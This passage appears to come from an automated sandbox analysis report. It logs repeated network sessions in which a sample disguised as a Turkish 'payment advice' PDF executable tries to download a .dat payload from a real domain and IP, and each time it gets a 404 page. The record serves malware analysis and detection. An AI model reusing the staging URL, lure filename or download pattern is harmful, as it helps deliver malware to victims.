      2024-12-16 13:20:33 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      91192.168.2.750061185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:34 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:35 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:35 GMT
      vary: User-Agent
      2024-12-16 13:20:35 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      92192.168.2.750062185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:36 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:37 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:37 GMT
      vary: User-Agent
      2024-12-16 13:20:37 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      93192.168.2.750063185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:38 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:39 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:38 GMT
      vary: User-Agent
      2024-12-16 13:20:39 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      94192.168.2.750064185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:40 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:20:41 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:40 GMT
      vary: User-Agent
      2024-12-16 13:20:41 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      95192.168.2.750065185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:42 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:43 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:42 GMT
      vary: User-Agent
      2024-12-16 13:20:43 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      96192.168.2.750066185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:44 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:20:44 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:44 GMT
      vary: User-Agent
      2024-12-16 13:20:44 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      97192.168.2.750067185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:46 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:46 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:46 GMT
      vary: User-Agent
      2024-12-16 13:20:46 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      98192.168.2.750068185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:48 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:20:48 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:48 GMT
      vary: User-Agent
      2024-12-16 13:20:48 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      99192.168.2.750069185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:49 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:20:50 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:50 GMT
      vary: User-Agent
      2024-12-16 13:20:50 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      100192.168.2.750070185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:51 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:52 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:52 GMT
      vary: User-Agent
      2024-12-16 13:20:52 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      101192.168.2.750071185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:53 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:20:54 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:54 GMT
      vary: User-Agent
      2024-12-16 13:20:54 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      102192.168.2.750072185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:55 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:20:56 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:56 GMT
      vary: User-Agent
      2024-12-16 13:20:56 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      103192.168.2.750073185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:57 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:20:58 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:57 GMT
      vary: User-Agent
      2024-12-16 13:20:58 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      104192.168.2.750074185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:59 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:20:59 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:59 GMT
      vary: User-Agent
